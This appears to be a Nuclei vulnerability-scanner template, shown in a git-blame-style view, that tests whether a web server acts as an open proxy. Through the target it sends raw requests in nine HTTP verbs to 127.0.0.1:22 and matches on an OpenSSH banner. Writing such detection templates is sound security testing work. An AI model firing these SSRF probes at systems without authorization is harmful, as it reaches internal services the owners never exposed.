2023-05-10 11:28:06 +00:00
|
|
|
id: ssrf-via-proxy
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: SSRF via Proxy Unsafe
|
|
|
|
author: geeknik,petergrifin
|
|
|
|
severity: unknown
|
|
|
|
reference:
|
|
|
|
- https://github.com/geeknik/the-nuclei-templates/blob/main/ssrf-by-proxy.yaml
|
|
|
|
- https://twitter.com/HusseiN98D/status/1649006265450782720
|
|
|
|
- https://twitter.com/ImoJOnDz/status/1649089777629827072
|
|
|
|
tags: ssrf,proxy,oast,fuzz
|
|
|
|
|
2023-05-11 09:17:44 +00:00
|
|
|
http:
|
2023-05-10 11:28:06 +00:00
|
|
|
- payloads:
|
|
|
|
verb:
|
|
|
|
- GET
|
|
|
|
- HEAD
|
|
|
|
- POST
|
|
|
|
- PUT
|
|
|
|
- DELETE
|
|
|
|
- CONNECT
|
|
|
|
- OPTIONS
|
|
|
|
- TRACE
|
|
|
|
- PATCH
|
|
|
|
|
|
|
|
raw:
|
|
|
|
- |+
|
|
|
|
{{verb}} http://127.0.0.1:22 HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
stop-at-first-match: true
|
|
|
|
unsafe: true
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "Protocol mismatch"
|
|
|
|
- "OpenSSH"
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|